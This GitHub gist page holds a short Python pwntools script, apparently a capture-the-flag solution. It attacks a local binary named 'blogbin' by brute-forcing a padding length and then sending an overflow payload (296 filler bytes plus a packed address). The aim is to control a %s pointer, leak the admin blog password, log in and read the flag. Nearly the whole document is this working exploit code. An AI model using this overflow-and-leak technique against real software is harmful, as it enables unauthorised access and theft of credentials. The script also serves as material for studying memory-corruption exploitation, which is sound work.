Created
July 3, 2016 03:10
-
-
Save CreateRemoteThread/c86e6d3d9618d6e0704e367ec74a2ce5 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # step 1: bruteforce | |
| # our first stage is to brute force how many "A"'s I need | |
| # to leak the admin pw. | |
| # step 2: leak the pwd | |
| # at this point, we control fully one %s pointer | |
| # which is used in the data leak. we use this to leak | |
| # the admin blog password | |
| # step 3: authenticate and read the flag. | |
| import pwn | |
| import struct | |
| def bruteforce_argv0(start,end): | |
| for i in range(start,end): | |
| p = pwn.process("./blogbin") | |
| print "i = %d" % i | |
| p.proc.stderr = p.proc.stdout | |
| p.sendline("add") | |
| p.sendline("a") | |
| p.sendline("b") | |
| p.recvuntil("Body?\n") | |
| p.sendline("Z"*i) | |
| ret = p.recvall() | |
| p.close() | |
| def print_overflow(offset,target): | |
| p = pwn.process("./blogbin") | |
| p.proc.stderr = p.proc.stdout | |
| p.sendline("add") | |
| p.sendline("a") | |
| p.sendline("b") | |
| p.recvuntil("Body?\n") | |
| p.sendline("%s%s" % ("Z"*offset,struct.pack("<L",target))) | |
| ret = p.recvall() | |
| p.close() | |
| if __name__ == "__main__": | |
| # bruteforce_argv0(293,297) | |
| print_overflow(296,0x804B080) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment